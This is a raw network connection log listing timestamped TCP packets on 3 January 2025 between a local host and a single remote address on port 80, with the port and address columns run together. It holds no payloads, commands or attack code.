                                                                                                                                                                        Jan 3, 2025 07:57:46.136652946 CET4974280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:46.215472937 CET804974286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:46.324254036 CET4974280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:47.166456938 CET4973980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:48.090563059 CET4974480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:48.095474005 CET804974486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:48.095597982 CET4974480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:48.095732927 CET4974480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:48.097466946 CET4974280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:48.100578070 CET804974486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:48.102536917 CET804974286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:48.102601051 CET4974280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:48.449249029 CET4974480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:48.454045057 CET804974486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:48.454267025 CET804974486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:48.795454025 CET804974486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:48.902282953 CET4974480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:48.928992033 CET804974486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:49.011656046 CET4974480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:51.257869005 CET4974580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:51.262742043 CET804974586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:51.262819052 CET4974580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:51.262942076 CET4974580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:51.267776012 CET804974586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:51.325253010 CET4974480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:51.334666967 CET804974486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:51.334759951 CET4974480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:51.621124983 CET4974580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:51.625999928 CET804974586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:51.626010895 CET804974586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:51.626019955 CET804974586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:51.965153933 CET804974586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:52.027283907 CET4974580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:52.082788944 CET804974586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:52.136645079 CET4974580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:52.552345991 CET4974580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:52.557626963 CET804974586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:52.558793068 CET4974580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:52.715183020 CET4974680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:52.720057011 CET804974686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:52.722791910 CET4974680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:52.722907066 CET4974680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:52.728158951 CET804974686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:52.995645046 CET4974680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:53.048048019 CET804974686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:53.207813025 CET804974686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:53.207861900 CET4974680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:53.630636930 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:53.635571957 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:53.635665894 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:53.855545044 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:53.860416889 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.214878082 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.219796896 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.219821930 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.219830990 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.324572086 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.330482006 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.332837105 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.332926035 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.337661028 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.353739023 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.402285099 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.492264986 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.684022903 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.688895941 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.688966990 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.708081007 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.710778952 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.060072899 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.115334034 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.115611076 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.120470047 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.120546103 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.120579958 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.120630980 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.196461916 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.196554899 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.435126066 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.439985991 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.792983055 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.797871113 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.797888994 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.797899961 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.801687002 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.917902946 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.012303114 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.106753111 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.443931103 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.444956064 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.445406914 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.449388027 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.449443102 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.450057030 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.450112104 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.450180054 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.450247049 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.450413942 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.455171108 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.808628082 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.813467979 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.813481092 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.813489914 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:57.143516064 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:57.277714014 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:57.277780056 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.276115894 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.276503086 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.281033993 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.281084061 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.281359911 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.281423092 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.281563997 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.286283970 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.636800051 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.641938925 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.641952038 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.641963005 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.959013939 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.027306080 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.090744019 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.136657953 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.200845957 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.200912952 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.205739021 CET804975486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.205832005 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.205846071 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.205894947 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.205971956 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.210701942 CET804975486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.315032959 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.318263054 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.319870949 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.319941998 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.320075989 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.324810982 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.364084959 CET804975486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.667983055 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.672904968 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.672918081 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.672925949 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.677817106 CET804975486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.677884102 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:01.016110897 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:01.146109104 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:01.146167994 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.019906998 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.020174980 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.024936914 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.025022984 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.025080919 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.025109053 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.025249958 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.029999018 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.371134043 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.376048088 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.376061916 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.376070976 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.703752995 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.824165106 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.830867052 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.933530092 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.989988089 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.990463018 CET4975880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.994988918 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.995235920 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.995299101 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.995332956 CET4975880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.995456934 CET4975880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:03.000221968 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:03.339874029 CET4975880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:03.344897985 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:03.344912052 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:03.344919920 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:03.675937891 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:03.803553104 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:03.803644896 CET4975880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:03.936320066 CET4975880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:03.936851978 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:03.941310883 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:03.941474915 CET4975880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:03.941629887 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:03.941729069 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:03.941817999 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:03.946644068 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:04.292999029 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:04.297895908 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:04.297913074 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:04.297924042 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:04.617603064 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:04.746752977 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:04.746831894 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:04.899204969 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:04.899605036 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:04.904278994 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:04.904341936 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:04.904459000 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:04.904588938 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:04.904695034 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:04.909477949 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.261818886 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.266746998 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.266766071 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.266776085 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.340678930 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.341118097 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.345594883 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.346359968 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.346512079 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.351305962 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.376962900 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.377036095 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.508089066 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.512902975 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.513009071 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.513067961 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.517859936 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.699254036 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.704200029 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.704296112 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.871100903 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:05.876044035 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.876055956 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:05.876064062 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.061213017 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.194315910 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.195446968 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.195494890 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.332257032 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.425364971 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.425457001 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.425534010 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.565886974 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.565977097 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.566205978 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.571079016 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.571254015 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.571290016 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.571496010 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.571518898 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.571569920 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.571609020 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.576379061 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.917990923 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:06.922975063 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.923021078 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:06.923033953 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.271229029 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.402940989 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.403016090 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.410644054 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.415420055 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.568852901 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.574062109 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.574151039 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.577133894 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.581958055 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.629832983 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.630057096 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.634866953 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.634895086 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.634934902 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.634957075 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.634972095 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.634988070 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.634993076 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.635010958 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.635016918 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.635042906 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.635067940 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.635071039 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.635087013 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.635121107 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.635138035 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.635152102 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.635164976 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.635201931 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.635214090 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.635221004 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.635248899 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.635271072 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.639796972 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.639833927 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.639878988 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.639902115 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.639983892 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640032053 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640041113 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.640069962 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640089035 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.640139103 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.640144110 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640175104 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640219927 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.640235901 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.640242100 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640258074 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640280008 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640288115 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.640302896 CET4976480192.168.2.486.110.194.28
